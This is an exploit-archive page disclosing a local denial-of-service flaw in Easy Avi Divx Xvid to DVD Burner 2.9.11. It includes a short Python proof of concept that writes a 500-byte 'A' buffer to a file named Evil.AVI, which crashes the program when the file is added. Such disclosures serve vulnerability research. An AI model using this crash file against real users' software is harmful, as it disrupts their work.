Easy Avi Divx Xvid to DVD Burner 2.9.11 .avi Denial of Service

2018.03.28

Credit: Hashim Jawad

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#!/usr/bin/python
###########################################################################################
# Exploit Title : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe #
# Tested on OS : Windows XP professional SP3 #
# Windows 10 professional 64-bit #
# Steps to reproduce : Add Evil.AVI and BOOM! #
###########################################################################################
buffer = "A" * 500
try:
f=open("Evil.AVI","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Easy Avi Divx Xvid to DVD Burner 2.9.11 .avi Denial of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.